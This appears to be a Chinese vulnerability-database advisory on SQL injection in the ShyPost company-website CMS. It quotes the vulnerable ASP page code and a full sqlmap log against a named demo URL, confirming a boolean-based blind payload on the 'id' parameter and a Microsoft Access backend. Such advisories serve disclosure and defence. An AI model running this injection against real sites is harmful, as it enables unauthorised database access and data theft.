|ShyPost企业建站系统SQL注射漏洞 - VULHUB开源网络安全威胁库

ShyPost企业建站系统SQL注射漏洞

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

出错文件：CompVisualizeBig.asp ``` set rs=server.createobject("adodb.recordset") sql="select * from CompVisualize order by id desc" rs.open sql,conn,1,1 dim MaPerPage MaPerPage=9 dim text,checkpage text="0123456789" Rs.PageSize=MaPerPage for i=1 to len(request("page")) checkpage=instr(1,text,mid(request("page"),i,1)) if checkpage=0 then exit for end if next If checkpage<>0 then If NOT IsEmpty(request("page")) Then CurrentPage=Cint(request("page")) If CurrentPage < 1 Then CurrentPage = 1 If CurrentPage > Rs.PageCount Then CurrentPage = Rs.PageCount Else CurrentPage= 1 End If If not Rs.eof Then Rs.AbsolutePage = CurrentPage end if Else CurrentPage=1 End if call list ``` '显示帖子的子程序 Sub list()%> select * from CompVisualize order by id desc 查询id的时候没有用引号，导致了sql注入的产生？是这样吗？ ``` D:\sqlmap>python sqlmap.py -u http://www.shypost.com/demo/CompVisualizeBig.asp?i d=10 _ ___ ___| |_ ___ ___ {1.0-dev-nongit-20150806} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 16:37:32 [16:37:32] [INFO] testing connection to the target URL [16:37:33] [INFO] heuristics detected web page charset 'GB2312' [16:37:33] [INFO] testing if the target URL is stable [16:37:34] [INFO] target URL is stable [16:37:34] [INFO] testing if GET parameter 'id' is dynamic [16:37:34] [INFO] heuristics detected web page charset 'ISO-8859-2' [16:37:34] [INFO] confirming that GET parameter 'id' is dynamic [16:37:35] [INFO] GET parameter 'id' is dynamic [16:37:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable [16:37:39] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vu lnerable to XSS attacks [16:37:39] [INFO] testing for SQL injection on GET parameter 'id' [16:37:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [16:37:45] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHER E or HAVING clause' injectable [16:37:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B Y or GROUP BY clause' [16:37:45] [WARNING] reflective value(s) found and filtering out [16:37:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [16:37:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o r HAVING clause' [16:37:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT ype)' [16:37:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [16:37:47] [INFO] testing 'MySQL inline queries' [16:37:48] [INFO] testing 'PostgreSQL inline queries' [16:37:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' [16:37:49] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' [16:37:49] [WARNING] time-based comparison requires larger statistical model, pl ease wait........... [16:37:56] [CRITICAL] considerable lagging has been detected in connection respo nse(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more) [16:37:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [16:37:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment) ' [16:37:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c omment)' [16:37:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' [16:37:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [16:38:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [16:38:00] [INFO] testing 'Oracle AND time-based blind' [16:38:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [16:38:01] [WARNING] using unescaped version of the test because of zero knowled ge of the back-end DBMS. You can try to explicitly set it using option '--dbms' [16:38:01] [INFO] automatically extending ranges for UNION query injection techn ique tests as there is at least one other (potential) technique found [16:38:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' sqlmap got a 302 redirect to 'http://www.shypost.com:80/demo/CompVisualizeBig.as p'. Do you want to follow? [Y/n] n [16:38:46] [INFO] checking if the injection point on GET parameter 'id' is a fal se positive GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any )? [y/N] y sqlmap identified the following injection point(s) with a total of 81 HTTP(s) re quests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=10 AND 6951=6951 --- [16:40:15] [INFO] testing MySQL [16:40:16] [WARNING] the back-end DBMS is not MySQL [16:40:16] [INFO] testing Oracle [16:40:16] [WARNING] the back-end DBMS is not Oracle [16:40:16] [INFO] testing PostgreSQL [16:40:17] [WARNING] the back-end DBMS is not PostgreSQL [16:40:17] [INFO] testing Microsoft SQL Server [16:40:17] [WARNING] the back-end DBMS is not Microsoft SQL Server [16:40:17] [INFO] testing SQLite [16:40:18] [WARNING] the back-end DBMS is not SQLite [16:40:18] [INFO] testing Microsoft Access [16:40:18] [INFO] confirming Microsoft Access [16:40:22] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft Access [16:40:22] [INFO] fetched data logged to text files under [*] shutting down at 16:40:22 ```

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™